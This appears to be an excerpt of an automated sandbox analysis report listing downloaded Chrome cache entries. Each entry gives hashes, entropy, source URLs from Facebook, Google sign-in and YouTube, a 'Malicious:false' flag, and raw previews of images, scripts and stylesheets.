                                                                                                                                                                                  Preview:......JFIF..............Photoshop 3.0.8BIM.......h..(.bFBMD0a000a6f010000411c0000c04400002748000092490000de6a00009dae0000d0b400009eba00006abe000096300100....C.....................................%...#... , #&')*)..-0-(0%()(...C...........(...((((((((((((((((((((((((((((((((((((((((((((((((((..........."..............................................................................5...J...^18#..bjg.dHI.....=..L.'.......Q.<....,.....C.......R....@b.....T..3...P.1%).S(..."zjf9J:N..K.RW<.H.H...L./qH.=...Guwt...OA1.....!..0P.....Gp.bHO$D.....&.H..Ba..D...$..\]..q...`2.....8...%dJH.....n...LI..g...Y[A..:H_XB..*X.wt$.B2@L..bJ$3....OGZD.2C.0....u.z/.!.N*X$..{.fN.........5j0BI....zX[8..Y..<PGO'LA.........:..y.r"....2H.#B....@2-.U.j.Z..BK.n..+joB.K...*V..@\....K+3...^SD...&........l.. ^..t...p..F.y2FC%..]J......U....B..e&.b..XM.m....z..j[6j.}.|.G..b....2.-.9Y......x.h.x8. .........LI$q..\y.\.,..[... .....7b...N.9Q.^..9.A....V..+..K.z..,.=.\.5m...jh[..p ...,..g0.Ij.92.

                                                                                                                                                                                  Chrome Cache Entry: 861

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 206x366, components 3
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):20006
                                                                                                                                                                                  Entropy (8bit):7.965359928567157
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:txbZmQhe06fUZwJJe2Dbv4Tnh6EFencuLxqUxoo:PZ7V68ZwK8D4cRT
                                                                                                                                                                                  MD5:D5ECA2F23A7078BED3070EBC84EA96E8
                                                                                                                                                                                  SHA1:C322C7FA7073B8576066240B3FB127A8DB2779F4
                                                                                                                                                                                  SHA-256:60036F5D1BF9DBB2AED8ADFC19A9837235704A31D55EEBDA9C3E1C9ECECC3781
                                                                                                                                                                                  SHA-512:58E387398E64EFFE7228E62356DB4F68D5645081DE5EBF7123FB81F521EC5BE5F7BA72098844806761DB25452FE2FD4C57F3069160D3AEBB1F348F0765284C8E
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://scontent-lga3-2.xx.fbcdn.net/v/t51.29350-10/428232266_1390459045167512_3345950587786141943_n.jpg?stp=dst-jpg_p206x206&_nc_cat=105&ccb=1-7&_nc_sid=1a7029&_nc_ohc=FPvTVhhqGEQAX_RRQ56&_nc_ht=scontent-lga3-2.xx&oh=00_AfDOhDFkLhGQRT2_cjmdnqK9hkNG4iQLIwiXg_21o45BwQ&oe=65DB0A38
                                                                                                                                                                                  Preview:......JFIF..............Photoshop 3.0.8BIM.......h..(.bFBMD0a000a6f010000c2060000ce10000023120000a11300002b2000007a3000008d3100000b330000a0340000264e0000....C.....................................%...#... , #&')*)..-0-(0%()(...C...........(...((((((((((((((((((((((((((((((((((((((((((((((((((......n...."................................................................................K....Lws.*]..4aA"E("_..zZ.i....c.\Bp..........3..u.g_..>}...K...^....P......=uC(..x<.G...v............<..d..S..M..n..&.1.....>o........A..........F.O=.{b....nJ."....:..o...$..U...s..]....s ...G.y.M....n.K...n..$..XV...n].&.,..C.R+.....]..fj3K/F(&.Z.S.......J.....'$9.^..)....._......2`..a...9..H.8$|.....u.....2.Q......n.......L#@...~.0..vKM...C5. |E..i.`.9 g8....;O.........QY....^.l.Q..d..l.....8../..\....;.+b..P...LN........rt..75.e.Ir..[,......~A.n/.t.V)>.H.;....Z....n.SD.......RF.O3.*....k.b7T..!....ll...\9..,..d..n....l....O...M}I%.@...j...J.m.tj,.%JQ..~..l.>...>.P.n.N....s...j*.

                                                                                                                                                                                  Chrome Cache Entry: 862

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (58866)
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):121373
                                                                                                                                                                                  Entropy (8bit):5.175781132651112
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:768:sLQpmW+m/KTYGu9AoaI/mQVzm75W8Zcz834SS40FGXUQvqO4pxuor3lQNO301J8d:ZI2eIgRhGQLv90/I9aCIqYtpp
                                                                                                                                                                                  MD5:51A93812AF114DD8902597F09089FC4B
                                                                                                                                                                                  SHA1:EC670CCE0D590B144B66D6CA2BF3B9035197655C
                                                                                                                                                                                  SHA-256:0E130A5E0B4D2DE21225B3085724A442F1038865EC311BCE53993C96581425B0
                                                                                                                                                                                  SHA-512:941E433E83C971B414D6DFBF39221D06C45AA86A8F1E8E49A768E5CAAE115D8D93E3DC4B8BB87890AFF0330263120E4AB26FD38ABF0E836DB90940C10BAC1058
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://static.xx.fbcdn.net/rsrc.php/v3iKvn4/y8/l/en_US/08tvGtKV3n4.js?_nc_x=Ij3Wp8lg5Kz
                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/..__d("CometUFICommentListRendererForCommentsAPITahoe_renderer$normalization.graphql",["CometTextWithEntitiesRelay_textWithEntities$normalization.graphql"],(function(a,aa,b,c,d,e){"use strict";a=function(){var a={alias:null,args:null,kind:"ScalarField",name:"id",storageKey:null},b={alias:null,args:null,kind:"ScalarField",name:"__typename",storageKey:null},c={kind:"Variable",name:"location",variableName:"feedLocation"},d={kind:"Variable",name:"use_default_actor",variableName:"useDefaultActor"},e={alias:null,args:[c,d],kind:"ScalarField",name:"can_viewer_comment",storageKey:null},f=[d],g={kind:"TypeDiscriminator",abstractKey:"__isActor"},h={alias:null,args:null,kind:"ScalarField",name:"name",storageKey:null},i={kind:"Variable",name:"scale",variableName:"scale"},j=[{alias:null,args:null,kind:"ScalarField",name:"uri",storageKey:null}],k={alias:"profile_picture_depth_0",args:[{kind:"Literal",name:"height",value:32},i,{kind:"Literal",name:"width",value:32}],concreteType:"Ima

                                                                                                                                                                                  Chrome Cache Entry: 863

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 206x366, components 3
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):16238
                                                                                                                                                                                  Entropy (8bit):7.9560567321793325
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:1UugLgikJ0BfImMpaIhZsArQGqBhbEliTrb9MZst1mWewzvdN:2JF8JpfHbQGTO/9oO1mnON
                                                                                                                                                                                  MD5:8C12AD7947D65186E30188F679B8CF04
                                                                                                                                                                                  SHA1:DB9400BCE0C384875CC9C57FFAA1122FA312CA21
                                                                                                                                                                                  SHA-256:808CA800D8D06F4FB60B80DA2520234C98BF3840F1866891B129D90090E21451
                                                                                                                                                                                  SHA-512:DF384249DDB2EC2E11B8259AC36AC38CCEBD99838FAB84EF2A271C644822D4C98B041137AEA33A090DBE73A520BB0A78D64ECCE3AF997010050FA65BB3AC4D9A
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://scontent-lga3-2.xx.fbcdn.net/v/t51.29350-10/428123856_900816005075294_7181717207666543197_n.jpg?stp=dst-jpg_p206x206&_nc_cat=1&ccb=1-7&_nc_sid=1a7029&_nc_ohc=Dnhk7bfE0acAX-DPRwy&_nc_ht=scontent-lga3-2.xx&oh=00_AfAE9C8SFL621u4Q58B4bQYUcMoDip1VpTQAvLFXEz3WvA&oe=65DB89CA
                                                                                                                                                                                  Preview:......JFIF..............Photoshop 3.0.8BIM.......h..(.bFBMD0a000a6f01000062060000100f0000361000006811000011190000ed250000fc26000089280000272a00006e3f0000....C.....................................%...#... , #&')*)..-0-(0%()(...C...........(...((((((((((((((((((((((((((((((((((((((((((((((((((......n...."..............................................................................p..S8U.z..Nj..pww.wp...S.;..........T.K...@.KdeJZ.V-. %)...h+.j.p.3.\.}:"..<..f.4...D..Z...w....%..@&.....j..5.$5.45.$9..9..:D."d..mr&.^K..9yG..,*#f.V\.C...(..M.Vn....9.....ej}"H.3....O.....s.xs&.h.Q./4....#..!b...:.L.:K9i.-.T.}S....9..c........|)RS...~..kE.Q.....eN.....m.U.l@?H.{..G.*.p.....Y.o.).9^..T.h..Id..D..V..a*Q.~U..Y.!;X. .......u..s8...,..L..X.....9.ji..c..3=<...X9..........;...@.#.... \..6.nc`xu.5.,.iU-^N0....=vu.....x..5^...e.Ql........&..o.>.}q.K..Et..cF.E.$^...v8.d.Xs...pW.}..a...[V.*.3.y...vL....q.i.u.b.5.t..../<.......m.....2Z.E.N.*.V..f..!..gO..n.O_..^>..-c.c..\&.[Z.....

                                                                                                                                                                                  Chrome Cache Entry: 864

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (1631)
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):38674
                                                                                                                                                                                  Entropy (8bit):5.373344735979869
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:768:AOZQqlnxITA3+sypwDMBub/6rur81gE0idWSBiHLztbyHgNkmtCgs+FwtNmle:efY+3g/br8qaWSBiHLRGHEbtCgKJ
                                                                                                                                                                                  MD5:9FB0BDB3A292F495914A785280685816
                                                                                                                                                                                  SHA1:2FBAC1566F42B41D336C3CEF46085A8ABA5291F4
                                                                                                                                                                                  SHA-256:8B94EC92B902A78BB5DCF8A9A5CF00B3F693738608FE110FF77A2E90FA62AA09
                                                                                                                                                                                  SHA-512:94E76518978E828E0EAA8B95C807E55DBF4E0EBA201FF5057906482AD5F57D2D2A6BA98F0EE16476688E3B5013525D06EAED692C6B795DAAE635F67B8CD100F7
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:"https://www.gstatic.com/_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en_US.QKwFb1UtQb4.es5.O/ck=boq-identity.AccountsSignInUi.NrxHlLi3bwM.L.B1.O/am=P2CJhmMBEJhZTvP3jJPDAAAAAAAAAAAAawA7/d=1/exm=_b,_tp/excm=_b,_tp,identifierview/ed=1/wt=2/ujg=1/rs=AOaEmlG2bCygi1DFAdwYKgmmvgAMIJrIdw/ee=ASJRFf:LANRae;Al0B8:kibjWe;DaIJ8c:iAskyc;EVNhjf:pw70Gc;EkYFhd:BDnJmb;EmZ2Bf:zr1jrb;Erl4fe:FloWmf;JsbNhc:Xd8iUd;LBgRLc:XVMNvd;Me32dd:MEeYgc;NPKaK:PVlQOd;NSEoX:lazG7b;Oj465e:KG2eXe;Pjplud:EEDORb;QGR0gd:Mlhmy;SMDL4c:K0PMbc;SNUn3:ZwDk9d;UpnZUd:nnwwYc;XdiAjb:NLiXbe;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;eBAeSb:zbML3c;iFQyKf:vfuNJf;io8t5d:yDVVkb;kMFpHd:OTA3Ae;nAFL3:NTMZac;nTuGK:JKNPM;oGtAuc:sOXFj;oSUNyd:K0PMbc;oXZmbc:tUnxGc;pXdRYb:fqEYIb;qddgKe:xQtZb;sP4Vbe:VwDzFe;uY49fb:COQbmf;ul9GGd:VDovNc;vNjB7d:YTxL4;wR5FRb:siKnQd;yxTchf:KUM7Z/m=byfTOb,lsjVmc,LEikZe"
                                                                                                                                                                                  Preview:"use strict";this.default_AccountsSignInUi=this.default_AccountsSignInUi||{};(function(_){var window=this;.try{._.moa=function(a){var b=0,c;for(c in a)b++;return b};_.noa=function(a){return a.Vg&&"function"==typeof a.Vg?a.Vg():_.ka(a)||"string"===typeof a?a.length:_.moa(a)};_.vn=function(a){if(a.Mg&&"function"==typeof a.Mg)return a.Mg();if("undefined"!==typeof Map&&a instanceof Map||"undefined"!==typeof Set&&a instanceof Set)return Array.from(a.values());if("string"===typeof a)return a.split("");if(_.ka(a)){for(var b=[],c=a.length,d=0;d<c;d++)b.push(a[d]);return b}return _.yb(a)};._.ooa=function(a){if(a.Lg&&"function"==typeof a.Lg)return a.Lg();if(!a.Mg||"function"!=typeof a.Mg){if("undefined"!==typeof Map&&a instanceof Map)return Array.from(a.keys());if(!("undefined"!==typeof Set&&a instanceof Set)){if(_.ka(a)||"string"===typeof a){var b=[];a=a.length;for(var c=0;c<a;c++)b.push(c);return b}return _.zb(a)}}};.var poa,soa,roa,qoa,Ln,Nn,Eoa,voa,xoa,woa,Aoa,yoa;poa=function(a,b,c){if(b)re

                                                                                                                                                                                  Chrome Cache Entry: 865

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (49034)
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):592331
                                                                                                                                                                                  Entropy (8bit):5.292387152328404
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3072:vofCO7sBbGEdIJ0yzTBC+UOM7LX84WxlMJvxHTIXzCZlIkyr9L2ucD+XB7b7k9lV:SsBJsVc+UjLC28XzoIk09aucD+XtmlV
                                                                                                                                                                                  MD5:EC8AD554FE5E2D83824855338EDB1DFD
                                                                                                                                                                                  SHA1:FABF297435FED12D987FB5AB6701C93E720159D2
                                                                                                                                                                                  SHA-256:BB8E6F96071C890065466ED3BB839D1F62349141F9F6F470632C86FD056EDDE4
                                                                                                                                                                                  SHA-512:253DBA48D2C888D09B25038571A80C84D7BCE94802ECD2711EAECCC4A85CDD71F884F70E85CB5448F2BA224EE7E9890C752DCFB0F30BF89414AF312F27555783
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:"https://static.xx.fbcdn.net/rsrc.php/v3/y6/l/0,cross/SHRN-LPzcY0.css?_nc_x=Ij3Wp8lg5Kz"
                                                                                                                                                                                  Preview:form{margin:0;padding:0}label{color:#606770;cursor:default;font-weight:600;vertical-align:middle}label input{font-weight:normal}textarea,.inputtext,.inputpassword{-webkit-appearance:none;border:1px solid #ccd0d5;border-radius:0;margin:0;padding:3px}textarea{max-width:100%}select{border:1px solid #ccd0d5;padding:2px}input,select,textarea{background-color:#fff;color:#1c1e21}.inputtext,.inputpassword{padding-bottom:4px}.inputtext:invalid,.inputpassword:invalid{box-shadow:none}.inputradio{margin:0 5px 0 0;padding:0;vertical-align:middle}.inputcheckbox{border:0;vertical-align:middle}.inputbutton,.inputsubmit{background-color:#4267b2;border-color:#DADDE1 #0e1f5b #0e1f5b #d9dfea;border-style:solid;border-width:1px;color:#fff;padding:2px 15px 3px 15px;text-align:center}.inputaux{background:#ebedf0;border-color:#EBEDF0 #666 #666 #e7e7e7;color:#000}.inputsearch{background:#FFFFFF url(/rsrc.php/v3/yL/r/unHwF9CkMyM.png) no-repeat left 4px;padding-left:17px}.html{touch-action:manipulation}body{back

                                                                                                                                                                                  Chrome Cache Entry: 866

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (467)
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):1883
                                                                                                                                                                                  Entropy (8bit):5.272533861322696
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:48:o7Y0+YhjHcL3A6Fw2FNWp7xOHAHfIt3Rrkx5lArw:oPHcL/Fc4HA/I25l0w
                                                                                                                                                                                  MD5:962D83C1E94431815B5E4D41344544FC
                                                                                                                                                                                  SHA1:08B95C7A5C5D18F31823908C07C4F5D662D868D9
                                                                                                                                                                                  SHA-256:42799DF72F65B09FB3F22A265966BB14BB376691E1C3119F4D5D537628B27486
                                                                                                                                                                                  SHA-512:C7E3B9DC2CCE90799252ED4418718CF52023EBFA23D3FE4576CF5B82E82CCDF2C7184E1989A3A3B91DBFE2FE72BBE7E8C7354F016F4FEE10B48CFA62F91C362D
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:"https://www.gstatic.com/_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en_US.J6zlSvuPGsg.es5.O/ck=boq-identity.AccountsSignInUi.y688-Pa0BpE.L.B1.O/am=P2CJlmMBEISZlnP-nnFyGAAAAAAAAAAArAHs/d=1/exm=A7fCU,AvtSve,Ctsu,EFQ78c,EGw7Od,EN3i8d,I6YDgd,IZ1fbc,IZT63,K0PMbc,KUM7Z,L1AAkb,LDQI,LEikZe,MpJwZc,NOeYWe,NTMZac,O6y8ed,PHUIyb,PrPYRd,RMhBfe,Rkm0ef,RqjULd,Rusgnf,SCuOPb,STuCOe,SpsfSb,UPKV3d,UUJqVe,Uas9Hd,VwDzFe,W2YXuc,YHI3We,YTxL4,ZUKRxc,ZZ4WUe,ZwDk9d,_b,_tp,aW3pY,b3kMqb,bPkrc,bSspM,bTi8wc,bm51tf,byfTOb,eVCnO,fFzhe,fJpY1b,fqEYIb,hc6Ubd,hmHrle,inNHtf,kSPLL,lsjVmc,ltDFwf,lwddkf,mWLH9d,my67ye,n73qwf,njlZCf,oLggrd,pxq3x,q0xTif,qPfo0c,qmdT9,sOXFj,siKnQd,soHxf,t2srLd,tUnxGc,vHEMJe,vfuNJf,w9hDv,ws9Tlc,xBaz7b,xQtZb,yRXbo,ywOR5c,zbML3c,zr1jrb,zy0vNb/excm=_b,_tp,identifierview/ed=1/wt=2/ujg=1/rs=AOaEmlHublJNG6l_TtY5gqKGP1QzXq7-qQ/ee=ASJRFf:LANRae;Al0B8:kibjWe;DaIJ8c:iAskyc;EVNhjf:pw70Gc;EkYFhd:yt7X5e;EmZ2Bf:zr1jrb;Erl4fe:FloWmf;JsbNhc:Xd8iUd;LBgRLc:XVMNvd;Me32dd:MEeYgc;NPKaK:PVlQOd;NSEoX:lazG7b;Oj465e:KG2eXe;Pjplud:EEDORb;QGR0gd:Mlhmy;SMDL4c:K0PMbc;SNUn3:ZwDk9d;UpnZUd:nnwwYc;XdiAjb:NLiXbe;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;eBAeSb:zbML3c;iFQyKf:vfuNJf;io8t5d:yDVVkb;kMFpHd:OTA3Ae;nAFL3:NTMZac;nTuGK:JKNPM;oGtAuc:sOXFj;oSUNyd:K0PMbc;oXZmbc:tUnxGc;pXdRYb:fqEYIb;qddgKe:xQtZb;sP4Vbe:VwDzFe;uY49fb:COQbmf;ul9GGd:VDovNc;vNjB7d:YTxL4;wR5FRb:siKnQd;yxTchf:KUM7Z/m=iAskyc,ziXSP"
                                                                                                                                                                                  Preview:"use strict";this.default_AccountsSignInUi=this.default_AccountsSignInUi||{};(function(_){var window=this;.try{._.k("iAskyc");._.ZX=function(a){_.I.call(this,a.Ha);this.window=a.Ea.window.get();this.Ac=a.Ea.Ac};_.A(_.ZX,_.I);_.ZX.Na=_.I.Na;_.ZX.Ba=function(){return{Ea:{window:_.lr,Ac:_.kC}}};_.ZX.prototype.Gn=function(){};_.ZX.prototype.addEncryptionRecoveryMethod=function(){};_.$X=function(a){return(null==a?void 0:a.aq)||function(){}};_.aY=function(a){return(null==a?void 0:a.mca)||function(){}};_.bY=function(a){return(null==a?void 0:a.cq)||function(){}};._.Szb=function(a){return new Map(Array.from(a,function(b){var c=_.n(b);b=c.next().value;c=c.next().value;return[b,c.map(function(d){return{epoch:d.epoch,key:new Uint8Array(d.key)}})]}))};_.cY=function(a){setTimeout(function(){throw a;},0)};_.ZX.prototype.fJ=function(){return!0};_.ir(_.im,_.ZX);._.l();._.k("ziXSP");.var AY=function(a){_.ZX.call(this,a.Ha)};_.A(AY,_.ZX);AY.Na=_.ZX.Na;AY.Ba=_.ZX.Ba;AY.prototype.Gn=function(a,b,c){var d;i

                                                                                                                                                                                  Chrome Cache Entry: 867

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 50x50, components 3
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):1571
                                                                                                                                                                                  Entropy (8bit):6.977108481507109
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:48:gWUXiWdhTN+VgdWmrkHDpDCOAHntXQdVmOBrwZ:mCArodDT4ntAdVn0
                                                                                                                                                                                  MD5:EFB5F12C6E9E89898B5B92091B6C32AA
                                                                                                                                                                                  SHA1:CD5B72EC38AC5AA86383B746324555D425456D1D
                                                                                                                                                                                  SHA-256:BFB434B05ECBAE23A0D1480977E3019A34A4E1100E624886D4952901A12BE56A
                                                                                                                                                                                  SHA-512:19C8BC17CB9A8EFC01E01A75E1812617B393D3D460FA823A488E726F51AED71523B2C29D544CC5B679073B73B5919BC711C6EE003A67938A1E7A8CA47F10A348
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://scontent-lga3-2.xx.fbcdn.net/v/t39.30808-1/402507106_3366840493461901_8064181354331655882_n.jpg?stp=cp0_dst-jpg_p50x50&_nc_cat=1&ccb=1-7&_nc_sid=11e7ab&_nc_ohc=hvDkMtWtGrUAX9qc80G&_nc_ht=scontent-lga3-2.xx&oh=00_AfC2oOEs3vGnFcXN-kNhCahLiakPAHvehQ2Xf1xwQah5BA&oe=65DBCB37
                                                                                                                                                                                  Preview:......JFIF..............Photoshop 3.0.8BIM.......h..(.bFBMD0a000a6e010000e301000072020000ab020000f3020000ad0300005c04000094040000d20400001805000023060000....C.....................................%...#... , #&')*)..-0-(0%()(...C...........(...((((((((((((((((((((((((((((((((((((((((((((((((((......2.2.."...............................................................................v...t.=...CJ.S.E.8sK..Q*.{..3......n......^.`.>XW.....A-0.__..."............................"#01...........,/P....2...&D.>....jXz...zy.-..Fy...c-..^^y.L.(.1b.@.+.Hiu$.m.x.^d......=.6...Nk.....Q.{_..ng=s.............................!1........?..tk)-8..J.uZ=.|............................1..!........?...".T.1.N.uh.rn?...+......................!1..."A#2BQq... 03a........?..,.B.S....v.Z....R^b:n..~5.......lt3xc.4V..C.S..J...^...$(.....q...42.l..C?EH.A{GT..v........f......1.I.........m..i.............$....................!1AQaq.....0..........?!.82.3v...........{.F.n..I....="9h...."\_..b.i

                                                                                                                                                                                  Chrome Cache Entry: 868

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (562)
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):151037
                                                                                                                                                                                  Entropy (8bit):5.6331112458386565
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3072:1VNOSOAG4zLMfdxFkQIkvA0xoMlCFpM5ws:vHNQfdxFkjkvA0xocCFpMf
                                                                                                                                                                                  MD5:3D6122041360052D41A6650330F78A74
                                                                                                                                                                                  SHA1:B540DC32BF68922D22A9A8DAA5BC521FCC9E3B2F
                                                                                                                                                                                  SHA-256:47090D76066413CFFCAFB50EEC7DFD79BBBD75EC46C03CCD303DBB67A0EA839F
                                                                                                                                                                                  SHA-512:E215AB5B85AECE1557E35A81FE6F807295BAB7EE823BC795B17B82C54FE603AEFAEE368380A6CA7AF055A949FCBB9A1F02C03432E9AF5CF5EB5B3F51B21551F1
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://www.youtube.com/s/player/5683fc5e/player_ias.vflset/en_US/offline.js
                                                                                                                                                                                  Preview:(function(g){var window=this;'use strict';var btb=function(a,b){var c=[];return g.MD(a,{query:b},function(d){c.push(d.getValue());return d.continue()}).then(function(){return c})},ctb=function(a,b){return"getAll"in IDBIndex.prototype?g.AD(a.j.getAll(b,void 0)):btb(a,b)},dtb=function(a,b){return g.FD(a,["captions"],{mode:"readonly",.Tb:!0},function(c){return g.Xqa(c.objectStore("captions"),b)})},etb=function(a){var b=new g.EP("und",new g.kR("Default","und",!0));.b.captionTracks=a.captionTracks;return b},ftb=function(a){return new g.dg(function(b,c){var d=a.length,e=[];.if(d)for(var f=function(n,p){d--;e[n]=p;0==d&&b(e)},h=function(n){c(n)},l=0,m;l<a.length;l++)m=a[l],g.hca(m,g.kb(f,l),h);.else b(e)})},O6=function(a){this.j=a},P6=function(){O6.apply(this,arguments)},gtb=function(){P6.apply(this,arguments)},htb=function(){P6.apply(this,arguments)},itb=function(){P6.apply(this,arguments)},jtb=function(){O6.apply(this,arguments)},ktb=function(){P6.apply(this,arguments)},ltb=function(){P6.ap

                                                                                                                                                                                  Chrome Cache Entry: 869

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (19300)
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):278309
                                                                                                                                                                                  Entropy (8bit):5.409028772835641
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:1536:fPHaQFjs1PlJ/yfJJubY9OD47YzD4HEBuP2IUeOkFCbPIO6I3uclVuYgyi3i8/Kj:m8xm7AP2Iqn/UmxgcSDOOa
                                                                                                                                                                                  MD5:340868CF2C840DE168D77463396D60D3
                                                                                                                                                                                  SHA1:4F1EFABA3EE4B1E1A26DEE1D178953BFB9188F5C
                                                                                                                                                                                  SHA-256:808EC6221BA222DA52AED8B83EA836EF99036392321892D31723BD5EAEC2700D
                                                                                                                                                                                  SHA-512:B78CFD4383440A54855A3F19573EBF18C16BDD3997BCB1B126D772E1B16947E6053382B6FE56F8195E023CAF7FCCD23EDC08340B9A137F6596ECD6C827E1ECB9
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://static.xx.fbcdn.net/rsrc.php/v3/yW/r/-xtNSS8Cn-Q.js?_nc_x=Ij3Wp8lg5Kz
                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/.."use strict";(function(){var a=typeof globalThis!=="undefined"&&globalThis||typeof self!=="undefined"&&self||typeof global!=="undefined"&&global;if(typeof a.AbortController!=="undefined")return;var b=function(){function a(){this.__listeners=new Map()}a.prototype=Object.create(Object.prototype);a.prototype.addEventListener=function(a,b,c){if(arguments.length<2)throw new TypeError("TypeError: Failed to execute 'addEventListener' on 'CustomEventTarget': 2 arguments required, but only "+arguments.length+" present.");var d=this.__listeners,e=a.toString();d.has(e)||d.set(e,new Map());var f=d.get(e);f.has(b)||f.set(b,c)};a.prototype.removeEventListener=function(a,b,c){if(arguments.length<2)throw new TypeError("TypeError: Failed to execute 'addEventListener' on 'CustomEventTarget': 2 arguments required, but only "+arguments.length+" present.");var d=this.__listeners,e=a.toString();if(d.has(e)){var f=d.get(e);f.has(b)&&f["delete"](b)}};a.prototype.dispatchEvent=function(a){if

                                                                                                                                                                                  Chrome Cache Entry: 870

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (4264), with no line terminators
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):4264
                                                                                                                                                                                  Entropy (8bit):5.023352101476255
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:48:cMR3GqZFZlZuAwkQ29BR6WtFfH/2Ff8FfSiY3hUgxJu8OJ/:cxC3wkQ29XtEmgiUhUgxJu8OJ/
                                                                                                                                                                                  MD5:9DEAE13C40798DFCA19BD14ED7039D60
                                                                                                                                                                                  SHA1:4BA302A1435B094031E4F2E1BCE1B6198F0CF825
                                                                                                                                                                                  SHA-256:CDAC5527DC3C1A9F38C6B00086B2A10B9E7EAA1E062314E548C1FA602D17BBBD
                                                                                                                                                                                  SHA-512:95B093D926535FA9454E3776A3E219B61502CE67AA2E659175AE879133DD35A6EFA1BFDBE5B6D3E3DD8BA1F0663892B44FD6F21BE17FEFA9725A234DFF3C5D0C
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://www.youtube.com/s/desktop/87423d78/cssbin/www-main-desktop-home-page-skeleton.css
                                                                                                                                                                                  Preview:#home-page-skeleton{position:relative;z-index:0;pointer-events:none;min-width:0;width:100%;opacity:1;margin:56px 0 0;display:-webkit-box;display:-webkit-flex;display:flex;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-webkit-flex-direction:row;flex-direction:row}#home-page-skeleton.hidden:not(.layered){opacity:0}#guide-skeleton{display:none;background-color:#fff;width:240px;-webkit-flex-shrink:0;flex-shrink:0;-webkit-box-orient:vertical;-webkit-box-direction:normal;-webkit-flex-direction:column;flex-direction:column}#guide-skeleton.collapsed{width:72px}#guide-skeleton .guide-item-ghost{padding:10px;width:100%}#guide-skeleton .guide-ghost{padding:10px 30px;display:-webkit-box;display:-webkit-flex;display:flex}#guide-skeleton .guide-ghost-icon{height:40px;width:40px;min-width:40px;margin-right:15px;border-radius:50%;background-color:hsl(0,0%,100%)}#guide-skeleton .guide-ghost-text{height:36px;width:100%;border-radius:8px;background-color:hsl(0,0%,100%)}@media (min-width:792p

                                                                                                                                                                                  Chrome Cache Entry: 871

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (776)
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):1480
                                                                                                                                                                                  Entropy (8bit):5.278661843249328
                                                                                                                                                                                  Encrypted:false
